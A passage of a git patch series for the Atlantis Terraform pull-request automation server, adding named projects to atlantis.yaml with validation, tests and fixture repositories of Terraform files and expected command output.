separately", + }, + { + description: "two projects with same dir/workspace only one with name", + input: ` +version: 2 +projects: +- name: myname + dir: . + workspace: workspace +- dir: . + workspace: workspace`, + expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately", + }, + { + description: "two projects with same dir/workspace both with same name", + input: ` +version: 2 +projects: +- name: myname + dir: . + workspace: workspace +- name: myname + dir: . + workspace: workspace`, + expErr: "found two or more projects with name \"myname\"; project names must be unique", + }, + { + description: "two projects with same dir/workspace with different names", + input: ` +version: 2 +projects: +- name: myname + dir: . + workspace: workspace +- name: myname2 + dir: . + workspace: workspace`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Name: String("myname"), + Dir: ".", + Workspace: "workspace", + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + { + Name: String("myname2"), + Dir: ".", + Workspace: "workspace", + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, + Workflows: map[string]valid.Workflow{}, + }, + }, } tmpDir, cleanup := TempDir(t) diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go index 29335e7954..3de10b5320 100644 --- a/server/events/yaml/raw/project.go +++ b/server/events/yaml/raw/project.go @@ -16,6 +16,7 @@ const ( ) type Project struct { + Name *string `yaml:"name,omitempty"` Dir *string `yaml:"dir,omitempty"` Workspace *string `yaml:"workspace,omitempty"` Workflow *string `yaml:"workflow,omitempty"` @@ -78,5 +79,7 @@ func (p Project) ToValid() valid.Project { // There are no default apply requirements. v.ApplyRequirements = p.ApplyRequirements + v.Name = p.Name + return v } diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go index b10452afeb..79f0cf7dbf 100644 --- a/server/events/yaml/raw/project_test.go +++ b/server/events/yaml/raw/project_test.go @@ -27,11 +27,13 @@ func TestProject_UnmarshalYAML(t *testing.T) { TerraformVersion: nil, Autoplan: nil, ApplyRequirements: nil, + Name: nil, }, }, { description: "all fields set", input: ` +name: myname dir: mydir workspace: workspace workflow: workflow @@ -42,6 +44,7 @@ autoplan: apply_requirements: - mergeable`, exp: raw.Project{ + Name: String("myname"), Dir: String("mydir"), Workspace: String("workspace"), Workflow: String("workflow"), @@ -168,6 +171,7 @@ func TestProject_ToValid(t *testing.T) { Enabled: true, }, ApplyRequirements: nil, + Name: nil, }, }, { @@ -182,6 +186,7 @@ func TestProject_ToValid(t *testing.T) { Enabled: Bool(false), }, ApplyRequirements: []string{"approved"}, + Name: String("myname"), }, exp: valid.Project{ Dir: ".", @@ -193,6 +198,7 @@ func TestProject_ToValid(t *testing.T) { Enabled: false, }, ApplyRequirements: []string{"approved"}, + Name: String("myname"), }, }, { diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go index b414f4607f..af17335c1b 100644 --- a/server/events/yaml/raw/step.go +++ b/server/events/yaml/raw/step.go @@ -3,6 +3,7 @@ package raw import ( "errors" "fmt" + "sort" "strings" "github.com/flynn-archive/go-shlex" @@ -93,6 +94,8 @@ func (s Step) Validate() error { for k := range elem { keys = append(keys, k) } + // Sort so tests can be deterministic. + sort.Strings(keys) if len(keys) > 1 { return fmt.Errorf("step element can only contain a single key, found %d: %s", diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go index 0a7ef2e972..fd182902aa 100644 --- a/server/events/yaml/valid/valid.go +++ b/server/events/yaml/valid/valid.go @@ -40,9 +40,19 @@ func (s Spec) FindProject(dir string, workspace string) *Project { return nil } +func (s Spec) FindProjectByName(name string) *Project { + for _, p := range s.Projects { + if p.Name != nil && *p.Name == name { + return &p + } + } + return nil +} + type Project struct { Dir string Workspace string + Name *string Workflow *string TerraformVersion *version.Version Autoplan Autoplan diff --git a/server/events_controller.go b/server/events_controller.go index d9e344fe55..e41fe75c23 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -182,7 +182,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // We use a Command to represent autoplanning but we set dir and // workspace to '*' to indicate that all applicable dirs and workspaces // should be planned. - autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) + autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", "", true) e.Logger.Info("executing command %s", autoplanCmd) if !e.TestingMode { go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) @@ -250,7 +250,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated) return } - e.Logger.Info("parsed comment as %s", parseResult) + e.Logger.Info("parsed comment as %s", parseResult.Command) // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 2cd7183c07..3853d1349b 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -31,23 +31,10 @@ import ( . "github.com/runatlantis/atlantis/testing" ) -/* -flows: -- pull request opened autoplan -- comment to apply - -github/gitlab - -locking - -merging pull requests - -different repo organizations - -atlantis.yaml - -*/ func TestGitHubWorkflow(t *testing.T) { + if testing.Short() { + t.SkipNow() + } RegisterMockTestingT(t) cases := []struct { @@ -136,7 +123,31 @@ func TestGitHubWorkflow(t *testing.T) { "atlantis apply -d staging", "exp-output-apply-staging.txt", "atlantis apply -d production", "exp-output-apply-production.txt", }, - ExpMergeCommentFile: "exp-output-merge-all-dirs.txt", + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "tfvars-yaml", + RepoDir: "tfvars-yaml", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply -p staging", "exp-output-apply-staging.txt", + "atlantis apply -p default", "exp-output-apply-default.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "tfvars no autoplan", + RepoDir: "tfvars-yaml-no-autoplan", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "", + CommentAndReplies: []string{ + "atlantis plan -p staging", "exp-output-plan-staging.txt", + "atlantis plan -p default", "exp-output-plan-default.txt", + "atlantis apply -p staging", "exp-output-apply-staging.txt", + "atlantis apply -p default", "exp-output-apply-default.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", }, } for _, c := range cases { @@ -156,8 +167,10 @@ func TestGitHubWorkflow(t *testing.T) { pullOpenedReq := GitHubPullRequestOpenedEvent(t) ctrl.Post(w, pullOpenedReq) responseContains(t, w, 200, "Processing...") - _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir) + if c.ExpAutoplanCommentFile != "" { + _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir) + } // Now send any other comments. for i := 0; i < len(c.CommentAndReplies); i += 2 { @@ -414,9 +427,10 @@ func assertCommentEquals(t *testing.T, expFile string, act string, repoDir strin exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile)) Ok(t, err) - // Replace all 'ID: 1111818181' strings with * so we can do a comparison. - idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) - act = idRegex.ReplaceAllString(act, "(ID: ******************)") + // Replace all 'Creation complete after 1s ID: 1111818181' strings with + // 'Creation complete after *s ID: **********' so we can do a comparison. + idRegex := regexp.MustCompile(`Creation complete after [0-9]+s \(ID: [0-9]+\)`) + act = idRegex.ReplaceAllString(act, "Creation complete after *s (ID: ******************)") if string(exp) != act { actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act") diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt index 81c3ec8bfa..f0608bcf22 100644 --- a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `production` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt index 2ec35e2786..ffc7878fe5 100644 --- a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `staging` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt index b64103b412..9712df1ee2 100644 --- a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt @@ -1,4 +1,4 @@ Locks and plans deleted for the projects and workspaces modified in this pull request: -- path: `runatlantis/atlantis-tests/staging` workspace: `default` -- path: `runatlantis/atlantis-tests/.` workspace: `default` +- path: `runatlantis/atlantis-tests/production` workspace: `default` +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt index 81c3ec8bfa..f0608bcf22 100644 --- a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt +++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `production` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt index 2ec35e2786..ffc7878fe5 100644 --- a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt +++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `staging` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt index 4c1f22f7a9..93654c7deb 100644 --- a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt index d467c8c713..6aed57ab53 100644 --- a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `staging` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt index ef14ca06f5..59398bd4e5 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt index e17039ffce..e167833832 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `new_workspace` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt index 8c49494b4a..bd2cd1207b 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt index 6c123ea8f5..ea31933908 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml new file mode 100644 index 0000000000..8dbfe353ec --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml @@ -0,0 +1,29 @@ +version: 2 +projects: +- dir: . + name: default + workflow: default + autoplan: + enabled: false +- dir: . + workflow: staging + name: staging + autoplan: + enabled: false +workflows: + default: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=default.backend.tfvars] + - plan: + extra_args: [-var-file=default.tfvars] + staging: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=staging.backend.tfvars] + - plan: + extra_args: [-var-file, staging.tfvars] diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars new file mode 100644 index 0000000000..a03acf6e2d --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars @@ -0,0 +1 @@ +path = "default.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars new file mode 100644 index 0000000000..c5e157a5d5 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars @@ -0,0 +1 @@ +var = "default" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt new file mode 100644 index 0000000000..9ccb1a95d6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. + +State path: default.tfstate + +Outputs: + +var = default +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt new file mode 100644 index 0000000000..e0d34d0905 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. + +State path: staging.tfstate + +Outputs: + +var = staging +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt new file mode 100644 index 0000000000..c09b916bd6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf new file mode 100644 index 0000000000..d4d77ff4e7 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf @@ -0,0 +1,19 @@ +terraform { + backend "local" { + } +} + +resource "null_resource" "simple" { + count = 1 +} + +variable "var" { +} + +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars new file mode 100644 index 0000000000..e8133a2b59 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars @@ -0,0 +1 @@ +path = "staging.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars new file mode 100644 index 0000000000..34f4bbb990 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars @@ -0,0 +1 @@ +var = "staging" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml new file mode 100644 index 0000000000..217e8fd995 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml @@ -0,0 +1,25 @@ +version: 2 +projects: +- dir: . + name: default + workflow: default +- dir: . + workflow: staging + name: staging +workflows: + default: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=default.backend.tfvars] + - plan: + extra_args: [-var-file=default.tfvars] + staging: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=staging.backend.tfvars] + - plan: + extra_args: [-var-file, staging.tfvars] diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars new file mode 100644 index 0000000000..a03acf6e2d --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars @@ -0,0 +1 @@ +path = "default.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars new file mode 100644 index 0000000000..c5e157a5d5 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars @@ -0,0 +1 @@ +var = "default" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt new file mode 100644 index 0000000000..9ccb1a95d6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. + +State path: default.tfstate + +Outputs: + +var = default +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act new file mode 100644 index 0000000000..aa4f734726 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act @@ -0,0 +1,7 @@ +Ran Apply in dir: `.` workspace: `default` +**Apply Error** +``` +no plan found at path "." and workspace "default"–did you run plan? +``` + + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt new file mode 100644 index 0000000000..e0d34d0905 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. + +State path: staging.tfstate + +Outputs: + +var = staging +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt new file mode 100644 index 0000000000..d51e3ff700 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt @@ -0,0 +1,51 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `.` +1. workspace: `default` path: `.` + +### 1. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- +### 2. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act new file mode 100644 index 0000000000..0da9bc5a5e --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act @@ -0,0 +1,61 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `.` +1. workspace: `default` path: `.` + +### 1. workspace: `default` path: `.` +**Plan Error** +``` +exit status 1: running "sh -c terraform init -no-color -backend-config=default.backend.tfvars" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/201347935/repos/runatlantis/atlantis-tests/1/default": + +Initializing the backend... + +Successfully configured the backend "local"! Terraform will automatically +use this backend unless the backend configuration changes. + +Initializing provider plugins... +- Checking for available provider plugins on https://releases.hashicorp.com... + +Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: net/http: TLS handshake timeout. + +Terraform analyses the configuration and state and automatically downloads +plugins for the providers used. However, when attempting to download this +plugin an unexpected error occured. + +This may be caused if for some reason Terraform is unable to reach the +plugin repository. The repository may be unreachable if access is blocked +by a firewall. + +If automatic installation is not possible or desirable in your environment, +you may alternatively manually install plugins by downloading a suitable +distribution package and placing the plugin's executable file in the +following directory: + terraform.d/plugins/darwin_amd64 + + +``` + +--- +### 2. workspace: `default` path: `.` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- + diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt new file mode 100644 index 0000000000..c09b916bd6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/main.tf b/server/testfixtures/test-repos/tfvars-yaml/main.tf new file mode 100644 index 0000000000..d4d77ff4e7 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/main.tf @@ -0,0 +1,19 @@ +terraform { + backend "local" { + } +} + +resource "null_resource" "simple" { + count = 1 +} + +variable "var" { +} + +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars new file mode 100644 index 0000000000..e8133a2b59 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars @@ -0,0 +1 @@ +path = "staging.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars new file mode 100644 index 0000000000..34f4bbb990 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars @@ -0,0 +1 @@ +var = "staging" \ No newline at end of file From 45d80fc695b445e70aeec2668f244730829016a1 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 19 Jun 2018 20:59:25 +0100 Subject: [PATCH 30/69] Fix gometalint errors. --- server/events/atlantis_workspace.go | 4 ++-- server/events/markdown_renderer.go | 1 - server/events/project_finder_test.go | 1 + server/events/project_operator.go | 6 +++--- server/events/runtime/init_step_operator.go | 1 + server/events/yaml/parser_validator_test.go | 8 -------- server/events_controller.go | 6 +++--- testing/temp_files.go | 4 +++- 8 files changed, 13 insertions(+), 18 deletions(-) diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index 67112b1ce4..06944bdae7 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -70,11 +70,11 @@ func (w *FileWorkspace) Clone( return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output)) } currCommit := strings.Trim(string(output), "\n") - if string(currCommit) == p.HeadCommit { + if currCommit == p.HeadCommit { log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit) return cloneDir, nil } - log.Debug("repo was already cloned but is not at 